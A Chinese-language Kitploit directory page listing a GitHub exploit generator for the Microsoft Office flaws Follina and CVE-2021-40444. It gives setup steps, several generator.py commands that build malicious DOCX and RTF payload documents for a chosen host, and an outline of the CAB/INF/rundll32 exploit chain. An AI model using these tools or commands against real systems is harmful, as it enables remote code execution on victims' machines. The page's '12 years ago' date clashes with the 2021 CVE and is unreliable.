Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Follina-CVE-and-CVE-2021-40444 — 这个仓库包含了用于利用Microsoft Office中Follina CVE和CVE-2021-40444漏洞的脚本和资源。这些脚本会生成恶意文档文件,可以在目标系统上执行任意代码。 | Kitploit
工具/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
Payload生成漏洞利用Web应用程序漏洞利用恶意软件分析渗透测试学习与教育
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

这个仓库包含了用于利用Microsoft Office中Follina CVE和CVE-2021-40444漏洞的脚本和资源。这些脚本会生成恶意文档文件,可以在目标系统上执行任意代码。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12年前尚未审核

利用Follina CVE和CVE-2021-40444漏洞

目录

  1. 简介
  2. 前提条件
  3. 设置与安装
  4. 使用方法
  5. 详细说明
  6. 命令
  7. 免责声明

简介

本仓库包含用于利用 Microsoft Office 中 Follina CVE 和 CVE-2021-40444 漏洞的脚本和资源。这些脚本会生成能够在目标系统上执行任意代码的恶意文档文件。

前提条件

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • 所需的 Python 包(列于 requirements.txt 中)

设置与安装

  1. Flare VM 设置:

    • 确保已安装 Flare VM。虚拟机的凭据为:
      • 用户名:lab
      • 密码:password
  2. Python 与虚拟环境:

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • 确保虚拟机上已安装 Python 和 pip。
    • 使用以下命令安装 virtualenv 包:
      root@kitploit:~
      pip install virtualenv
      
    • 创建一个名为 venv 的虚拟环境:
      root@kitploit:~
      python -m virtualenv venv
      
    • 激活虚拟环境:
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • 安装所需的包:
      root@kitploit:~
      pip install -r requirements.txt
      

使用方法

  1. 生成攻击载荷:

    • 进入项目目录,运行以下命令生成攻击载荷:
      root@kitploit:~
      python generator.py -u http://192.168.197.132 -P test\calc.dll --host
      
      将 192.168.197.132 替换为你的 IP 地址。
  2. 访问生成的文档:

    • 生成的 .docx 文件位于以下目录:
      root@kitploit:~
      C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
      

详细说明

链式利用过程

  • 打开文档(.docx)。
  • 文档中包含一个指向存储在 document.xml.rels 中的恶意 HTML 的关系。
  • HTML 链接在 IE 预览中打开。
  • 一个对象指向 CAB 文件,另一个 iframe 指向 INF 文件,两者均嵌入在 JScript 中,并以 .cpl: 指令作为前缀。
  • CAB 文件被打开,并将 INF 文件保存到 %TEMP%Low 目录中。
  • 使用 .cpl: 指令打开 INF 文件,导致 rundll32 侧加载该 INF 文件。

脚本概述

generator.py

  • 实现了针对 CVE-2021-40444 的攻击载荷,允许通过 Microsoft Office 远程执行代码。
  • 包含多种辅助函数,用于修补 CAB 文件、创建 RAR 文件、生成载荷等。

cab_parser.py

  • 一个查看 CAB 文件头的工具。
  • 定义了用于处理和解析 CAB 文件的类和方法。

第 2.0 节:在 Flare VM 中设置

  • 安装必要的工具和包。
  • 创建并激活虚拟环境。
  • 从 requirements.txt 安装 Python 包。

命令

  • 生成原始攻击载荷并在本地测试:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.dll --host
    
  • 生成利用 MS-MSDT(Follina 攻击)的无 CAB 攻击载荷,同时生成 DOCX 和 RTF 文档:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
    
  • 生成无 CAB 攻击载荷(仅 IE),使用 HTML 走私,并通过 IE 在本地测试:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
    
  • 生成带 RAR 的无 CAB 攻击载荷,并通过 IE 在本地测试:
    root@kitploit:~
    python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
    

免责声明

本项目仅供教育目的使用。请负责任地使用,不要在没有授权的情况下利用漏洞攻击系统。滥用此信息可能导致刑事指控。

下载工具